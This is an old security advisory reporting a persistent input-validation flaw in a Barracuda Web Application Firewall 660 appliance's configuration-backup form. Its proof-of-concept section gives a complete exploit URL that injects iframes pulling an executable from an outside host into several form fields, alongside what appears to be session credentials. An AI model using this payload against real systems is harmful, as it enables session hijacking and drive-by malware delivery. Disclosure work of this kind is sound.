Pentest Information: ==================== GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance). A remote attacker is able to get sensitive customer sessions (hijack)or can implement script routines & malicious codes(server-side|persistent). Details: ======== Tested on OS: Windows 7 Tested with Software: Mozilla Firefox (SEC|MOD) & Web-Developer Suite Vulnerable Products: Barracuda - Web Application Firewall 660 (Appliance) Affected Versions: Firmware v7.3.2.015 (2009-12-04 01:20:36) Model 660 Vulnerability Type: Input Vaildation Vulnerability (server-side|persistent) Security-Risk: Medium Basement Category: Application|Hardware Vendor-URL: http://barracuda.com/ Product-URL: http://www.barracudanetworks.com/ns/products/archiver-overview.php Demo-URL: http://server/cgi-mod/index.cgi Vendor-Status: Not Informed Patch/Fix-Status: No Fix/Patch Advisory-Status: Published | 19.12.2009 UNPUBLIC Advisory-URL: http://global-evolution.info/01xGE/Archive/12.2009/BC%20Web%20Firewall%20660%20v7.3.1.007%20-%20Input%20Validation%20Vulnerability/19.12.2009_BC%20Web%20Firewall%20660%20v7.3.1.007%20-%20Input%20Validation%20Vulnerability.txt PUBLIC Advisory-URL: * GE DB-ID: 818 CVE-ID: () OSVDB-ID: () Introduction: ============= The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site. * Protection against common attacks * Outbound data theft protection * Web site cloaking * Granular policies * Secure HTTP traffic * SSL Offloading * SSL Acceleration * Load Balancing The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase the performance and scalability of these applications. The Barracuda Web Application Firewall offers every capability needed to deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface. * Single point of protection for inbound and outbound traffic for all Web applications * Protects Web sites and Web applications against application layer attacks * Delivers best practices security right out of the box * Monitors traffic and provides reports about attackers and attack attempts The Barracuda Web Application Firewall provides award-winning protection from all common attacks on Web applications, including SQL injections, cross-site scripting attacks, session tampering and buffer overflows. Many applications are vulnerable to such attacks because application developers do not consistently employ secure coding practices. Barracuda Web Application Firewall is designed to combat all attack types that have been categorized as significant threats, including: * Cross Site Scripting (XSS) * SQL injection flaws * OS command injections * Site reconnaissance * Session hijacking * Application denial of service * Malicious probes/crawlers * Cookie/session tampering * Path traversal * Information leakage (Copy from the vendors homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php) More Details: ============= A IVE vulnerability is detected on Barracuda - Web Application Firewall 660 with Firmware v7.3.2.015 (2009-12-04 03:23:23am) Attackers can use the vulnerability script code executions & specific manipulations. When exploited by an authenticated user, the identified vulnerabilities can lead to Information Disclosure, Session Hijack, access to Intranet available servers. Server: archiver.barracuda.com File: index.cgi Para: ?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username= ... &&backup_password= Screen: http://img10.imageshack.us/img10/4506/ive1.png http://img10.imageshack.us/img10/1138/ive2.png Proof of Concept: ================= The vulnerabilities can be exploited by potencial attackers. On our Pentests we verified the vulnerability by loading a "bad-example.exe" (http://img10.imageshack.us/img10/4506/ive1.png) file out of the Barracuda - WebFirewall 660 Appliance Application. Script code executions & specific manipulations are possible over that form to get access on intranet. For demonstration ... Vulnerable Module: [+] Backup - Automated Configuration Backups References(URL): http://wsf.barracuda.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US Site-Code Review:

Complete Site-Code Review: http://nopaste.info/a6b47158b4.html Fix & Patch: ============ Restrict the Input fields & format the the output when try to show the connection status. Set clear + working exceptions in the filter or let session expire after illegal character errors. Involve in the fixes the re-included stuff like the auto backup script on ftp ... Security Risk: ============== An attacker is able to include malicious script routines on server-side of the Barracuda - WebFirewall 660. When exploited by an authenticated user, the identified vulnerabilities can lead to Information Disclosure, Session Hijack, access to Intranet available servers.The security risk is estimated as medium because of server-side. Author: ======= The author & writer is part of "Global-Evolution" Security(GESEC). GESEC Vulnerability-Research Team protects software, services, applications & informs the vendors on a secured base. ________.__ ___. .__ ___________ .__ __ .__ / _____/| | ____\_ |__ _____ | | \_ _____/__ ______ | | __ ___/ |_|__| ____ ____ / \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c) \ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \ \______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| / \/ \/ \/ \/ \/

Query Builder